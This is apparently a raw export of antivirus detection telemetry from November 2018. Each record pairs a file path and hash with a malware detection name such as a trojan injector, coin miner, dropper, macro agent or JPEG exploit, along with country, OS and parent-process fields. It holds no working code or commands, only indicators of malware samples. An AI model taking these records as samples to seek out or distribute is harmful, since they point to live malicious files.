  Row(detection=Row(filename='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2B281F21B6EC5E53939A80DF65B9B361FCE25140E055722265D95073211FA812', filesize=192000, name='TR/Crypt.ZPACK.Gen.#M300.#R555'), hash='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='378968ed5f0f0f3a368db5f66fdd7e023f9a4b826f5f4a5010bb6853fc829227', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-02T08:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libcr64.dll', filepath='C:\\Windows\\Temp\\fda77a64\\libcr64.dll', filesize=128000, name='TR/AD.CoinMiner.eukdq.#M1.#R1'), hash='726a9f478aaed66f0e4168594f2662198e8856e7e0f4e79085cff7c397dcc083', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00007654', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp00007654', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053957-b3f4753f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053957-B3F4753F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001f89', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001f89', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050705-1c960486', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050705-1C960486', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vvorifuc.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\vvoRifUC.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a315014efeb7a5b1077522aab9b488ce719ecad7ac8ed576552a0e4778d3e9c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A315014EFEB7A5B1077522AAB9B488CE719ECAD7AC8ED576552A0E4778D3E9C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6a315014efeb7a5b1077522aab9b488ce719ecad7ac8ed576552a0e4778d3e9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055630-03efc01c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055630-03EFC01C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055249-80402752', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055249-80402752', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131309-a804d7d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131309-A804D7D6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202439-5165641e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d43ee73c\\AVSCAN-20181102-201805-1A7B5F93\\AVSCAN-20181102-202439-5165641E', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:24:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055810-3fa8d8f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055810-3FA8D8F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Documents\\MEGA\\Setup (1)\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Documents\\MEGA\\Setup (1)\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:20:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055939-749011e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055939-749011E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054544-82dfa4d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054544-82DFA4D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123604-0aac4443', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-123604-0AAC4443', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:39:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145242-fdea84de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145242-FDEA84DE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-223224-349eedab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc160031\\AVSCAN-20181101-223112-2886A263\\AVSCAN-20181101-223224-349EEDAB', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='4f505ca422d8fb8c70caf2c16671c84cae98f7cb77ae4486da13901fe0897c18', metadata=Row(cmdline=None, country='DO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050318-953d25ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050318-953D25CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whmpeuph.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\WhMpeUpH.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061805-07db3dc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061805-07DB3DC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053830-802b4f7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053830-802B4F7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055011-21feb7f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055011-21FEB7F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062605-25df22bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062605-25DF22BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051323-fda2f991', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051323-FDA2F991', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054523-7660dd49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054523-7660DD49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052656-e295d863', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052656-E295D863', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054045-d07f77a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054045-D07F77A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051850-c0c72617', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051850-C0C72617', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060802-a086569a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060802-A086569A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052708-e9510b48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052708-E9510B48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053857-9056840a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053857-9056840A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054607-9094625b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054607-9094625B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054945-125af59f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054945-125AF59F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054915-0050b501', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054915-0050B501', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055037-3198807a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055037-3198807A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050927-71441f8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050927-71441F8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053603-28b23729', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053603-28B23729', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061818-0f43bbda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061818-0F43BBDA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062040-6405b4fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062040-6405B4FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052122-1b694fd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052122-1B694FD9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060310-f26be6a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060310-F26BE6A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051659-7ec2cb5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051659-7EC2CB5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055510-d4513b5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055510-D4513B5C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051252-eba6e3e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051252-EBA6E3E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055836-4ec29be2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055836-4EC29BE2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:42:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050540-e9a2d716', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050540-E9A2D716', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:38Z'), dt=datetime.date(2018, 11, 2)),
